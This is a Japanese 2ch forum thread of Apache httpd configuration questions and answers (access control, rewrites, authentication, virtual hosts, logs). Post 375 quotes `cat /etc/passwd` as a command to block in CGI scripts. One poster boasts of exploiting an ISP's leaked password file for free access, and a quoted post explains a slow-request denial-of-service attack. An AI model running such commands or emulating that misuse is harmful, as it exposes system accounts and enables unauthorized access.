・ErrorDocumentディレクティブは設定していない
・Tomcatからはエラーページが返っている(mod_jk.logのダンプで確認)
・しかし上の直後に"No body with status=xxx for worker=workerx"と出力されている
 →エラーページがbodyとして返ってきているのに何故???
・Tomcatのエラーページの拡張子を.varにするとちゃんとTomcat側のエラーページが表示できる

何故こうなるのか思い当たる点がある方、いらっしゃいませんでしょうか。

306 :名無しさん@お腹いっぱい。2009/11/07(土) 23:41:45
Linuxの場合そんなことが出来るのか
俺はFreeBSDだけどprocファイルシステム有効にしよっかな
310 :名無しさん@お腹いっぱい。2009/11/14(土) 00:27:40
質問です。特定のipからのアクセスは、robots.txt以外全て拒否しようとして以下のように書きましたが、robots.txtを含めてアクセスを遮断してしまいます。
どこが悪いんでしょうか?

<Location />
Order Allow,Deny
Allow from all
Deny from 1.1.1.1
</Location>

<Files robots.txt>
Order Deny,Allow
Allow from all
</Files>
311 :名無しさん@お腹いっぱい。2009/11/14(土) 00:32:09
312 :名無しさん@お腹いっぱい。2009/11/14(土) 00:34:59
IPってゆうな。クズ。
313 :名無しさん@お腹いっぱい。2009/11/14(土) 05:26:50
>>312
IPv6からしかアクセスできないようにしたいのかもしれないだろ。
314 :名無しさん@お腹いっぱい。2009/11/14(土) 08:46:43
ipって略したらIPv4、ってこともないわけだが。
316 :名無しさん@お腹いっぱい。2009/11/14(土) 09:52:05
>>314
もちろん。IPv4だけにしたいのかもしれない。当人に聞いてみろ。
315 :名無しさん@お腹いっぱい。2009/11/14(土) 08:49:22
ip(小文字)っていうのは、iprouteというソフトに入ってるコマンド。
iprouteでのアクセスを遮断したい、という質問だろ。
318 :名無しさん@お腹いっぱい。2009/11/28(土) 13:07:02
Apache 1.3でSSIを使うために
AddType text/x-server-parsed-html .html
を追加したのですが、すると
http://www.mysite.com/
でindex.htmlにアクセスしたとき、ファイルを保存のダイアログが出てしまいます。
(IE6.0です)
なにか回避方法はないでしょうか?
319 :名無しさん@お腹いっぱい。2009/11/28(土) 13:08:53
>>318
アクセスしてみたけどダイアログ出なかったよ?
320 :名無しさん@お腹いっぱい。2009/12/02(水) 06:16:35
現在、httpd.confで、以下のように、アクセス禁止をしています。
<Directory "/home/">
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Directory>

しかしこれだと、JPGなどの画像ファイルにはアクセスされてしまいます。
これを、画像ファイルだけ遮断させて、HTMLは表示させるということはできないでしょうか?

<Files ~ "\.(gif|png|jpg)$
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Files>
これを試してみましたが、機能しませんでした。
321 :3202009/12/02(水) 06:59:47
<Files ~ "\.(gif|jpe?g|png)$">
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Files>
これにしたらいけました
お騒がせしてすいません
323 :名無しさん@お腹いっぱい。2009/12/07(月) 12:05:33
Apache License 2.0ライセンスのjar(改編なし)を梱包した商用製品をリリースする場合についてですが、
ライセンス翻訳には「要求するのは、ユーザーがそのソフトウェアに Apache License のコードが使われていることを知らせる文言を入れることだけである」
とあり、使用ライブラリ名の明記までは書かれていないので、
複数使用していても、
製品マニュアルに「Apache License 2.0のライブラリを使用しています。」と、載せておけばよいのでしょうか?
翻訳だけではライセンスの満たし方がわかりにくいので、その辺わかりやすく解説しているサイト等もありましたら、
教えていただけないでしょうか?
324 :名無しさん@お腹いっぱい。2009/12/14(月) 12:44:44
急な質問で申し訳ないのですが。
わたしのサーバで、/var/www/htmlのWEB公開用ディレクトリにconfが置いてあるみたいなのですが、大丈夫でしょうか。
confにはifcfg-eth0など、ネットワーク関連の設定ファイルが入っています。
このディレクトリにconfをおいた覚えはないのですが、何かのバグですか?
もしくはクラッキングされてしまったのでしょうか。

OSはCentOS5.3です。
327 :名無しさん@お腹いっぱい。2009/12/19(土) 12:20:18
>>324 そのマシンも、あんたも、多分、大丈夫ではない。
328 :名無しさん@お腹いっぱい。2009/12/24(木) 21:19:46
>>324
それで思い出した。
もう10年以上も前だけど、むかしベッコアメってプロバイダがあってね
そのホームページスペースに自分がアップロードした覚えのないファイルが突如出現したりしてたんだ
ファイル名はcoreなんだけど、当時はcoreの意味がわからなくて、気味悪いからとりあえずFTPでダウンロードしてHEXDUMPしてみたら
中身が/etc/passwordでひっくり返ったことがあった。
サポートに電話してもよくわかないというから、じゃあ自分の持ち物扱いなんだなということで
まぁ、あまりヘンな自慢はできないしアレだけど、その日から数年間ネットの通信料はタダで生活できました。
325 :名無しさん@お腹いっぱい。2009/12/14(月) 13:18:02
何言ってんの。
326 :名無しさん@お腹いっぱい。2009/12/14(月) 13:27:46
>>325以外に返す言葉が見つからない
329 :名無しさん@お腹いっぱい。2009/12/24(木) 23:21:48
10年前と言うことは、不正アクセス禁止法成立前か?
330 :名無しさん@お腹いっぱい。2009/12/25(金) 01:03:03
>>329
父性にアクセスしてない気もするが(w
331 :名無しさん@お腹いっぱい。2010/01/06(水) 07:15:59
板違いではあるのですが、Windows XP Professional SP2で、
apache2.2を動かしていて、perl v5.10.0でプログラムを書いていますがうまく動きません。

具体的には、
http://www.stackasterisk.jp/tech/program/perl04_02.jsp
に書いてある★Dにsleep 10;を書くと、すぐにブラウザが開放されず、
10秒ほど読み込み中の状態になります。

Windowsを使っているのが悪いのでしょうか?
UNIX板の皆さんの意見をお聞かせ下さい。

332 :名無しさん@お腹いっぱい。2010/01/06(水) 08:03:30
>>331
板違い。
http://pc11.2ch.net/php/
333 :名無しさん@お腹いっぱい。2010/01/06(水) 09:01:08
>>332
ご指摘どうもです。そちらの板の
perlスレで聞くことにしました。
334 :名無しさん@お腹いっぱい。2010/01/20(水) 22:43:02
前々から聞きたいなと思っていたのですが、アクセスログを見ていると、
時々リファラに複数のURIが併記されたものがあります。例えば今さっき来たヤツですが、
http://yellowinphotograph.net/apage/22875.php,
http://www.stephenblog.com/?p=867,
http://210.24.175.20:880/xoops/modules/newbb/viewtopic.php?post_id=19749,
http://astinweddingordinators.com/2009/12/15/2010-wedding-trends.aspx,
http://sumissionword.com/submit-link/, http://www.mah.on.ca/Page7030.aspx,
http://www.doctorconsult.com.ar/en/component/artforms/?formid=2,
http://bridsmajor.blog128.fc2.com/blog-entry-15.html, http://austincar.co.cc/addjob.php,
http://travelguide.blog.com/travel_leisure/cruises/italy-the-heaven-of-parmesan-and-ham/,
http://travelguide.blog.com/travel_leisure/asia/indonesia/bali/visit-india-travel-by-visit-tnt-new-report-on-travel-in-india/,
http://ho.hoorku.com/index.php?option=com_adsmanager&page=write_ad&catid=7&Itemid=0,
http://job.co.cc/addjob.php
みたいな具合。これは一体何なんですか?
## 上記のすべての URI は、実際のログから取得した文字列に手を入れてあります。
## また長過ぎる行があると言われて跳ねられるので URI の区切れ目で改行しています。
335 :名無しさん@お腹いっぱい。2010/01/20(水) 23:15:18
特定のWikiを狙い撃ちしてる
350 :3342010/01/22(金) 01:42:03
>>335-338 ご意見をありがとうございます。
もしかしたら、と思って自分の blog で弾かれている trackback のリストと apache のログを照合すると、
そのまんまピッタリでした。というわけで、なんかトラックバック・スパム?みたいなもののようです。
実害は無いので無視しておくことにします。
337 :名無しさん@お腹いっぱい。2010/01/21(木) 03:34:30
自動でリファラ表示するサイト向けの宣伝、とか。
いずれにせよあんまり気にしてもしょうがないと思う。
338 :名無しさん@お腹いっぱい。2010/01/21(木) 06:43:52
うちだと複数のURLがつながってるのは無いけど、どっかのアフィブログのURLがくっついてるのはよくあるな
339 :名無しさん@お腹いっぱい。2010/01/21(木) 08:47:11
SEO?
340 :名無しさん@お腹いっぱい。2010/01/21(木) 09:43:51
>>339
SEOとは何を略した言葉で何を意味するのかわかっていれば
そんなことは言えないと思うんだ
341 :名無しさん@お腹いっぱい。2010/01/21(木) 13:11:38
2ch型の掲示板みたいなの(というか主にlog置場)を作りたいんですが、
cgi-binの下に dat/ と subject.txt を置くと error.log に

attempt to invoke directory as script: C:/xampp/cgi-bin/○○○/

と出てしまいますが、httpd.conf の書き方が間違っているんでしょうか?
それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
教えてください。
345 :名無しさん@お腹いっぱい。2010/01/21(木) 13:33:16
>>341
> それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
はい。
346 :3412010/01/21(木) 13:40:11
>>344
それは分っているのですが、ファイル収集のためにcgiを書ました。
>>345
そうなんんですか!? 2chもてっきりそうなってると思ってたんですが、
よくみると2chのスレのURLにはcgi-binって入ってませんね。。。
monazilla とかで2chがどうなっているか聞いたほうがいいんでしょうか。
347 :名無しさん@お腹いっぱい。2010/01/21(木) 13:44:59
>>346
2chでも
http://pc12.2ch.net/unix/subject.txt
http://pc12.2ch.net/unix/dat/1222729860.dat
とかはただ置いてあるだけ。
CGIは経由していない。

ファイル収集はまた別の話。区別しろ。
348 :3412010/01/21(木) 13:54:28
>>347
なるほど。考えなおします。ありがとうございました。
342 :3412010/01/21(木) 13:24:29
ここ↓みたいな感じにできればいいなと思っているんですが。
http://navi2ch.sourceforge.net/log/
344 :名無しさん@お腹いっぱい。2010/01/21(木) 13:31:15
>>342
これは単にファイルが置いてあるだけだよ。
CGIとか関係ない。
343 :3412010/01/21(木) 13:28:13
書き忘れました。 httpd.confにはこう書ました。

<Directory c:/xampp/cgi-bin/○○○/>
Options Indexes
Order allow,deny
Allow from all
</Directory>

349 :3412010/01/21(木) 16:49:48
御陰さまでJaneとLive2chで読み込めるのを確認できました。
どうもありがとうございました。
351 :名無しさん@お腹いっぱい。2010/01/28(木) 17:37:41
FreeBSD(fsdb使えれば)はinodeわかればln(fdsbのコマンド)できる。
zfsでのサルベージ方法教えろ。
354 :名無しさん@お腹いっぱい。2010/02/26(金) 18:40:21
すみません。
起動中のApacheのMPMがPreforkかWorkerかのどちらであるか調べるコマンドありますか?
Apache 2.0系です。
355 :名無しさん@お腹いっぱい。2010/02/26(金) 20:43:36
>>354
環境がわからないけどこんな感じ
apachectl -V
apache2ctl -V
356 :名無しさん@お腹いっぱい。2010/02/27(土) 02:00:21
普通に考えたらそうなんだけど、既に起動中のhttpdが
それと同じバイナリファイルから起動されたものであるの
保証がなかったりするから100%ではないような。
358 :名無しさん@お腹いっぱい。2010/02/27(土) 13:42:24
>>356
Apache Server Informationとか
357 :名無しさん@お腹いっぱい。2010/02/27(土) 02:31:42
あぁあるかも
最近の鯖はCPUはやくてメモリーもたくさん詰めるから
httpd複数立てたほうが効率的だったりするんだよね
ServerLimitとかMaxClientsの上限低すぎるとおもうなー
動画配信とかで1プロセスあたりコネクトしてる時間が異様に長い子沢山なサーバってどういうMax/Limit設定にしてるんだろ?
359 :名無しさん@お腹いっぱい。2010/02/27(土) 14:48:32
リブートできる権限があるならMPMを確認した上でリブートしてしまうのが
360 :名無しさん@お腹いっぱい。2010/02/27(土) 14:51:13
.htaccessが使えるならこの辺を組み合わせるとか。
<IfModule mpm_prefork_module>
<IfModule mpm_worker_module>
SetEnvIf
361 :名無しさん@お腹いっぱい。2010/02/27(土) 19:00:33
workerかpreforkならpsでスレッド情報まで出すオプション付ければ良いんじゃない?
362 :名無しさん@お腹いっぱい。2010/03/01(月) 01:28:32
straceで追いかければ動作の違いから判定できるかな?
あと、TeXとかEmacsみたいに任意のプロセスイメージを実行ファイルに
ダンプしてくれるコマンドがあったから、それでダンプして-Vとか。
363 :名無しさん@お腹いっぱい。2010/03/24(水) 19:42:20
BASIC認証で使っていい文字ってどんなの?
364 :名無しさん@お腹いっぱい。2010/03/25(木) 04:35:58
>>363
http://abt-archi.com/manual/programs/htpasswd.html#restrictions
「:」がイリーガルキャラクタ
255文字以下であること
あと、AuthName は文字コードを渡せないから日本語だとブラウザによって文字化けする
365 :名無しさん@お腹いっぱい。2010/04/05(月) 09:40:25
/var/log/httpdを見ていて気づいたのですが、
ログファイルのオーナーがrootになっています。
User apache
Group apache
として、デーモンはapacheユーザで走らせているのに関わらずです。
何故このような動作をするのでしょうか?
367 :名無しさん@お腹いっぱい。2010/04/09(金) 16:36:25
CGIプログラムを作ってて、今までは家のテストサーバーで動かしてたのですが、
だいぶバグも取れてきたので、VPSを借りて公開してみようかと思っています。

そこで質問なんですが、公開する場合、やはりApacheの設定とかってかなり
セキュリティを意識してやらないといけないでしょうか?
家のテストサーバーはCentOSの入門書に書いてあった通り、とりあえずCGIを
使えるように設定しただけなんですが、この程度の知識でVPSでCGIプログラム
を公開するのは無謀ですか?

またお勧めのサイトや書籍等も教えてください。 よろ
369 :3672010/04/09(金) 16:48:01
>>368

すみません>>367の質問はApacheの設定についての質問の
つもりなんですが・・・
Linux板にApacheスレが見つからなかったもんで・・・
371 :名無しさん@お腹いっぱい。2010/04/09(金) 16:59:35
>>369
くだ質スレでいいよ。
372 :3672010/04/09(金) 17:04:08
>>371

行ってきます
368 :名無しさん@お腹いっぱい。2010/04/09(金) 16:41:58
Linuxの話はLinux板で。
370 :名無しさん@お腹いっぱい。2010/04/09(金) 16:58:13
>>368
「Linuxの話はLinux板で」という返しは年寄りスレで。
374 :名無しさん@お腹いっぱい。2010/05/09(日) 10:40:41
ファイルには更新日時がつくのですが、ディレクトリにアクセスして、DirectoryIndexにあるデフォルトのhtmlファイルが表示された際に、
更新日時が送られません。
更新日時を送るようにするにはどうしたらよいものでしょうか?
375 :名無しさん@お腹いっぱい。2010/06/13(日) 22:55:01
suexecでperlをCGIで動かしてるんですが
`cat /etc/passwd`;とか
system("/usr/bin/foo");
とかユーザがコマンドを実行できないようにするには
どう対処すればいいでしょうか?
377 :名無しさん@お腹いっぱい。2010/06/18(金) 07:15:55
質問です。

友人の鯖で、cssが遅いです。

Fedora12
apache 2.2.15

GET hoge.css
をすると、
?/p?$???E??稟@?@??凄w?1??P狒9??LP ?s??HTTP/1.1 200 OK
Date: Wed, 16 Jun 2010 22:00:12 GMT
Server: Apache/2.2.15

1行目が文字化けの余計なレスポンスが
結局cssは適用されるんだけど、読み込むまでに15秒とか掛かっています。

mime.type と 文字コードの確認はしました。
後考えられる原因は何があるでしょうか?
宜しければ教えて下さい。お願い致します。
378 :名無しさん@お腹いっぱい。2010/06/26(土) 18:48:52
こういうURLを
http://aaaa.net/uploda/img/aaaa989141.jpg

のように置き換えるにはどうしたらいいでしょうか?


http://aaaa.net/uploda/index.php?=98914
379 :名無しさん@お腹いっぱい。2010/07/08(木) 15:33:52
>>378
小学生レベルだな
RewriteRule ^/uploda/img/aaa(.*)\.jpg /uploda/index.php?=$1
381 :3782010/07/10(土) 06:24:19
>>379
ありがとう!!!
382 :名無しさん@そうだ選挙に行こう2010/07/11(日) 09:09:43
>>380
俺も見たとき思ったw

>>378
これ変換前後が逆じゃね?
387 :名無しさん@お腹いっぱい。2010/07/12(月) 07:29:27
>>378
そろそろ正解を。
413 :名無しさん@お腹いっぱい。2010/09/19(日) 08:35:51
>>378
IPベースのバーチャルホストを使う
418 :4102010/09/20(月) 13:07:30
皆さんありがとうございます
>>413のいうバーチャルホストで振り分けする方式にしました
380 :名無しさん@そうだ選挙に行こう2010/07/10(土) 06:09:14
つーか、そもそもの順序が逆だと思うのは俺だけかなぁ・・・
384 :名無しさん@そうだ選挙に行こう2010/07/11(日) 18:53:17
要求は 989141 であって 98914 ではないんだから、それではうまくいかないのでは?
386 :名無しさん@そうだ選挙に行こう2010/07/11(日) 22:01:42
変換前後が逆だと思ってる香具師は素人
388 :名無しさん@お腹いっぱい。2010/07/12(月) 09:56:28
>>386
つまり画像ファイルへ直リンされたときはcgi経由のURLに自動的に戻し
アダルト広告を表示させたい、とあなたはそう仰っているわけですね?(キリッ
389 :名無しさん@お腹いっぱい。2010/07/12(月) 13:43:18
>>388
わざわざ出てきて、無知な素人だと必死でアピールしなくても良いぞ。
素人は引っ込んでろよ。www
390 :名無しさん@お腹いっぱい。2010/07/12(月) 18:33:35
素人はきっと画像ファイルがそこにあるという先入観が取れないんだろうな
391 :名無しさん@お腹いっぱい。2010/07/13(火) 22:23:12
RewriteRuleって、Locationセクション内に
書けないんだっけ?
マニュアルだけ見ると、できなさそうな
感じなんだけど…。

392 :名無しさん@お腹いっぱい。2010/07/13(火) 22:30:03
書けるけど、書かないほうがいい
393 :名無しさん@お腹いっぱい。2010/07/14(水) 13:00:49
>>392
どうして?
書けるなら書こうと思ったんだけど。
サイト別にアクセス制限したくて。
394 :名無しさん@お腹いっぱい。2010/07/14(水) 16:23:33
ヒント:
  無限ループ
395 :名無しさん@お腹いっぱい。2010/07/14(水) 19:10:59
>>394
もうひとこえ!
397 :名無しさん@お腹いっぱい。2010/07/14(水) 19:25:58
無限ループは発生しないだろ。発生するというなら実例示してよ。
398 :名無しさん@お腹いっぱい。2010/07/14(水) 23:33:06
LocationとかDirectory内(ディレクトリコンテキスト)に書くより、
トップレベルとかVirtualHost内(サーバーコンテキスト)に書くほうがはるかに簡単
401 :名無しさん@お腹いっぱい。2010/07/21(水) 18:51:48
>>398
そりゃあそうなんだけど。

>サイト別にアクセス制限したくて。
とか書きにくいところが困りもの。
トップレベルとVirtualHostセクションは
一回しか書けないんで、記述の
整理がやりにくい。

402 :名無しさん@お腹いっぱい。2010/08/04(水) 23:58:52
Ubuntu 10.04 に apt で Apache2.2 をインストールしました。
そのあと以下を見て viewvc をインストールしました。
http://d.hatena.ne.jp/yaakaito/20090105/1231163794

現在、http://example.jp/cgi-bin/viewvc.cgi とアクセスすると
自分の Subversion リポジトリを見ることが出来ます。

質問:
/cgi-bin/viewvc.cgi にアクセスが来たときだけBasic認証を掛けたい。
/cgi-bin/hoge.cgi など、viewvc.cgi 以外の cgi にアクセスが来たときは、
これまで通り認証は掛けたくない。
これを実現するにはどのように httpd.conf を書けばいいでしょうか?
403 :名無しさん@お腹いっぱい。2010/08/05(木) 00:00:22
>>402 の続き:
/etc/apache2/sites-available/default は以下のようになっていて
(apt で apache をインストールした直後)
「ここから追記した」というブロックを追記した後、
http://example.jp/cgi-bin/viewvc.cgi にアクセスしても認証ダイアログが出ませんでした。

<Directory "/usr/lib/cgi-bin"> のところで AllowOverride None しているから?

<VirtualHost *:80>
 ServerAdmin webmaster@localhost

 DocumentRoot /var/www
 <Directory />
  Options FollowSymLinks
  AllowOverride None
 </Directory>
 <Directory /var/www/>
  Options Indexes FollowSymLinks MultiViews
  AllowOverride None
  Order allow,deny
  allow from all
 </Directory>

404 :名無しさん@お腹いっぱい。2010/08/05(木) 00:00:40
>>403 の続き:

 ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
 <Directory "/usr/lib/cgi-bin">
  AllowOverride None
  Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
  Order allow,deny
  Allow from all
 </Directory>                       ←ここまで apt でインストールしたときのままの状態

 <Directory "/usr/lib/cgi-bin/viewvc.cgi">    ←ここから追記した
  AuthType Basic
  AuthName "Subversion Repository"
  AuthUserFile /etc/apache2/hoge.passwd
  require valid-user
 </Directory>
405 :名無しさん@お腹いっぱい。2010/08/05(木) 02:55:09
>>404
Files
406 :名無しさん@お腹いっぱい。2010/08/28(土) 16:13:56
FreeBSD6.2, Apache1.3.42, PHP5.3, Python2.7にてmod_pythonがsegmentasion Faultで落ちました。

んで、mod_wsgiをインストールしようとしたのですが、Pythonを--without-thread指定しないとコンパイルが通りません。
--without-threadを付けてPythonをインストール後、mod_wsgiをインストールしようとすると、PythonのThredを有効にしてインストールしろと怒られます。

何か解決方法はありますか…?orz
409 :4062010/08/28(土) 21:14:25
あー、うん。

FreeBSD8.0, Apache2.2.16, PHP5.3, MySQL5.1, Python2.7, mod_wsgi3.3 で動きました。

あー、うん、うん、うん…。orz
410 :3782010/09/19(日) 03:41:24
自宅サーバー1台
フレッツ光ネクスト回線1本
ルーターは使わずPPPoEで接続しています。

で今使っているプロバイダ1社
これをもう1社追加して、マルチセクション(http://www.daifukuya.com/photoxp/archives/pppoe-multi-session.html)で
自宅サーバーのAフォルダを回線Aに、Bフォルダを回線Bに割り当てしたいのですが、
サーバー側の設定としてどうしたらいいでしょうか?

どうぞよろしくお願いしますm(__)m
414 :名無しさん@お腹いっぱい。2010/09/19(日) 08:37:20
>>410
apache あんまり関係ない...
OS のポリシールーティング+αや
ブロードバンドルータならNATで
別ポートで動かした apache 2つにつなげればいいんじゃね
411 :名無しさん@お腹いっぱい。2010/09/19(日) 07:35:13
セッションとセクションの違いがわかる大人になってから出直してください。
412 :4102010/09/19(日) 08:22:56
マルチセッションですね
分かる方いらっしゃいましたらお願いしますm(__)m
416 :名無しさん@お腹いっぱい。2010/09/19(日) 08:40:38
OS という表現は変だな
サーバマシンでってことで。

ついでに、サーバマシンに2IP ふれば
ルーターかましててもIPベースだけで
ことが足りるのかな
417 :名無しさん@お腹いっぱい。2010/09/19(日) 08:53:46
まてよ、PPPoEってことはiPアドレス不定だから設定ファイルにIPアドレスを書けないな。
その辺は工夫が必要だ。たとえばiptableで固定のIPアドレスに転送するとか、
設定ファイルを動的に書き換えるようにするとか。
422 :Perl忍者 ◆M5ZWRnXOj6 2010/09/26(日) 20:01:11
サーバー友君だった・・・
無駄にわけやがってファイルきもい
conf.d/securityにかかないときかなかった
423 :名無しさん@お腹いっぱい。2010/11/14(日) 18:08:47
ログフォーマットについて質問します。
今ログは
isp.example.com - - [14/Nov/2010:18:05:25 +0900] "GET /foo.htm HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
のような形式なのですが、
GET /foo.htm ではなく GET http://example.net/foo.htm
のようにドメインまで表示するようにするには
どうすればいいのでしょうか?
424 :名無しさん@お腹いっぱい。2010/11/14(日) 23:16:29
425 :名無しさん@お腹いっぱい。2010/11/15(月) 02:14:16
>>424
ありがとうございます
426 :名無しさん@お腹いっぱい。2010/12/15(水) 13:52:06
2.2.17のapr_pstrdupにバグ
apr_pallocが確保したメモリは初期化されていない → memcpy(NULL文字コピーされず)
428 :名無しさん@お腹いっぱい。2010/12/17(金) 17:46:15
> NULL文字
これだけで、超初心者とわかるから報告しなくて良いよ。

> NULL文字列
更笑
429 :名無しさん@お腹いっぱい。2010/12/19(日) 13:48:05
loadbalancerってapacheのmod_proxy_balancerとipvsadmってどっちがいいの?
430 :名無しさん@お腹いっぱい。2010/12/19(日) 14:51:28
>>429
用途が違う
431 :名無しさん@お腹いっぱい。2010/12/19(日) 18:26:06
>>430
kwsk
432 :名無しさん@お腹いっぱい。2010/12/19(日) 18:31:09
>>431
少しはググれよ
434 :名無しさん@お腹いっぱい。2010/12/21(火) 02:35:23
>>431
レイヤー
436 :名無しさん@お腹いっぱい。2010/12/22(水) 05:10:02
mod_proxyとLVSを比較して「どっちがいいの?」というような質問をするということは
冗長化や負荷分散に関してほとんど知識がない人ということだから、推奨するとすればmod_proxyのほうでしょう
もっといえばmod_proxyを使いこなすのは難しいでしょうから、おすすめとしてはpoundです
437 :名無しさん@お腹いっぱい。2010/12/22(水) 10:18:51
いや、そういう人へのオススメは「アウトソースしろ」でしょ。
439 :名無しさん@お腹いっぱい。2011/01/20(木) 23:46:47
mod_pythonをいれてpythonを動かしいます。
httpd.confで
PythonHandler test
にして、test.pyを動かしているのですが、このようにファイル名をいちいち指定しないで動かすにはどうしたらいいでしょうか?
441 :名無しさん@お腹いっぱい。2011/01/23(日) 18:47:18
質問です。
Apacheのaccess_logの見方についてですが、以下の304はなんと表現するのが正しいのでしょうか?

xxx.xxx.xxx.xxx - test [23/Jan/2011:18:16:15 +0900] "GET /test.css HTTP/1.1" 304 -

順番に
アクセスしてきた相手のIPアドレス
認証があった場合に使用されたユーザID
アクセスされたサーバ時刻
GETはリクエストヘッダー、GET方式での呼び出し
/test.cssはファイル名、
HTTP/1.1はプロトコルバージョン
304は・・・??

よろしくお願いします。
443 :名無しさん@お腹いっぱい。2011/01/23(日) 18:54:14
もしかして304ってキャッシュ呼び出しですかね?
例えば304のかわりに200で後ろが-でなく数値があれば、リクエスト通って、実際に送出したデータ量(バイト)

という認識でOKですよね。自己解決しました
444 :名無しさん@お腹いっぱい。2011/01/23(日) 18:57:13
なぜ規格書(RFC)にあたらないのだ? 死んだ曾々爺さんの遺言か?
447 :名無しさん@お腹いっぱい。2011/03/17(木) 18:20:00.70
自宅サーバで動的DNSをしていると
再起動したあとにIPアドレスが変わり名前と違うようになるみたいで
apacheが立ち上がったときに https だけがこけています。(httpはOK)

その後落ち着いてから apache を再起動すると https もうまく起動します。
これを最初から https もこけずに起動できるようにするにはどうすればよいでしょうか。
449 :名無しさん@お腹いっぱい。2011/03/17(木) 18:37:38.43
pppのリンクアップでrestartとかどーよ?
516 :名無しさん@お腹いっぱい。2011/08/04(木) 07:37:37.77
449 忍法帖【Lv=40,xxxPT】 ◆8huU.uGZBA sage 2011/08/03(水) 15:02:01.85 ID:49.133.48.168 0
サーバへにリクエストが来た時、リクエストを受け取るまでhttpdは待っているわけだ
しかしcontentslength分だけ受け取りたいけど待てど暮らせど送ってこないから
httpd.confのtimeoutするまでそのhttpdプロセスがブロックされるんだな
そしてそれがたーくさんたまる、売り切れまで溜まる
売り切れたらそれ以降のhttpの要求は受け付けなくなる

攻撃がやんだらブロックされているhttpdは順次timeoutで開放され
だんだんいつもの状態に近づく

こうなんじゃないかな?

456 ◆IOT1IIO1ILUU-さる♪ sage 2011/08/03(水) 15:06:18.97 ID:219.106.108.87 0
>>449
大体はそんな感じです。
少し違うのは、Content-Lengthは関係ありません。
中途半端なHTTPリクエストであってもApacheが律儀にTCPのタイムアウトまでリソースを確保して待ってしまうのが原因なので、
それこそTCPで何か少しでもデータを送ってやれば、HTTPリクエストとして完全に破綻していてもApacheは落ちます。
なのでHTTPのヘッダに着目して対策するのは無理です。
451 :名無しさん@お腹いっぱい。2011/03/17(木) 18:53:23.39
IPv4ならNATで内部用固定アドレスに向かわせて
Apacheはその固定アドレス:443をListenさせるとかw

IPv6はどう対処させようか。
サーバなのにtempaddrで運用するってのもアレだけどw
453 :4472011/03/17(木) 19:07:02.36
ServerName をかくといけたようです。様々なアイデアありがとうございました!
454 :名無しさん@お腹いっぱい。2011/03/24(木) 00:54:18.21

【2ch激論】ダム板が統合・廃止へ!人気スレ「また騙されてダム板に…」がなくなる?
http://kamome.2ch.net/test/read.cgi/river/1299720645/
455 :名無しさん@お腹いっぱい。2011/04/23(土) 20:14:19.39
apache 1.3系の頃はBASIC認証の失敗時にも
ログにそのユーザ名が記録されていたんだけど
2.2系に変更したら失敗時は"-"と記録されるようになった。
2.2でも1.3のようにログすることってできないかな?
456 :名無しさん@お腹いっぱい。2011/04/25(月) 01:52:04.73
>>455
マジで?そうだとすると、マニュアルに書いてあることが間違ってるね

http://httpd.apache.org/docs/2.2/mod/mod_log_config.html
>リモートユーザ (認証によるもの。ステータス (%s) が 401 のときは意味がないものである可能性がある)
457 :名無しさん@お腹いっぱい。2011/04/25(月) 21:21:40.24
2.2.17 で試してみたけど、そんなことない。
ユーザにプロンプトが出る前に一回 401 が返るけどそのログと見間違えてる?
mod_log_config.c の log_remote_user を見ても、- になるのは NULL のときだよ。
458 :名無しさん@お腹いっぱい。2011/04/25(月) 22:55:22.44
>>456
うん、マニュアルと一致しなくておかしいなぁ、と思ってた。

>>457
う〜ん、なんでだろう。見間違いはないんだけよね。
でもうち以外では挙動が違うってのはうれしい情報。
もうちょっと調べてみる。
459 :名無しさん@お腹いっぱい。2011/05/10(火) 12:06:13.87
質問させてください。
apacheのプロセス番号からアクセスしているURLを調べることってできますでしょうか?
ご教示いただけると幸いです。
467 :名無しさん@お腹いっぱい。2011/05/22(日) 23:13:08.31
>>459
モジュール内部でgetpidとrequest_recみてやればいい。
462 : 忍法帖【Lv=4,xxxP】 2011/05/17(火) 13:18:40.00
ErrorDocument 404 /usr/home/foo/bar/404.html
のように、ローカルの絶対パスで指定ってできないんでしょうか?

環境httpdバージョン2.2
465 :名無しさん@お腹いっぱい。2011/05/17(火) 23:46:14.18
>>462
先に
Alias /404.html /usr/home/foo/bar/404.html
すればよくね?
466 : 忍法帖【Lv=4,xxxP】 2011/05/18(水) 05:00:26.65
>>465
そうやるしかなさそうですね。ありがとございます。
468 :名無しさん@お腹いっぱい。2011/05/25(水) 15:58:06.65
質問です。
マルチポストすみません。

以下の設定が前提です。

■ ディレクトリ構成(一部抜粋)
/var/www/hoge
/var/www/hoge/hage
/var/www/hoge/hage/hige

■ httpd.conf(一部抜粋)
DocumentRoot /var/www/html

Alias /hage /var/www/hoge/hage
<Directory "/var/www/hoge/hage">
SSLRequireSSL
ErrorDocument 403 "SSL Require -> https://"
AllowOverride All
Order allow,deny
Allow from all
</Directory>

【やりたいこと】
ディレクトリ /hage「だけ」に SSL をかけたいです。

【こまっていること】
上記設定ですと、/hage/hige にも SSL がかかってしまいます。
/hage にだけ SSL をかけることはできますでしょうか?
(そもそもの設定が間違っている可能性大ですが)
よろしくお願いいたします。
470 :名無しさん@お腹いっぱい。2011/05/27(金) 21:19:19.24
VirtualHostを複数立てて、どれのServerNameにもマッチしないときには
一番上に書いたものにマッチするそうですが、これを拒否する方法はありますか?
472 :名無しさん@お腹いっぱい。2011/05/31(火) 11:34:45.66
/home/test/public_html/ ディレクトリと
/home/test/admin/test.cgi というファイルがあってこのtest.cgiを
実行させたいんですが、以下のようにすると client denied by server
configuration で動きません。

<VirtualHost 123.123.123.123:80>
DocumentRoot /home/test/public_html
ServerName www.test.com
ScriptAlias /ugoke/ "/home/test/admin/"
</VirtualHost>

/home/test/public_html/test.cgi に置くと問題なく動くんですが
ScriptAliasはDocumentRootの下を指定しないといけないんでしょうか?

Apache1.3系だと上のような設定で動いているんですが・・・
今は2.0.64です。
473 :名無しさん@お腹いっぱい。2011/05/31(火) 11:42:53.97
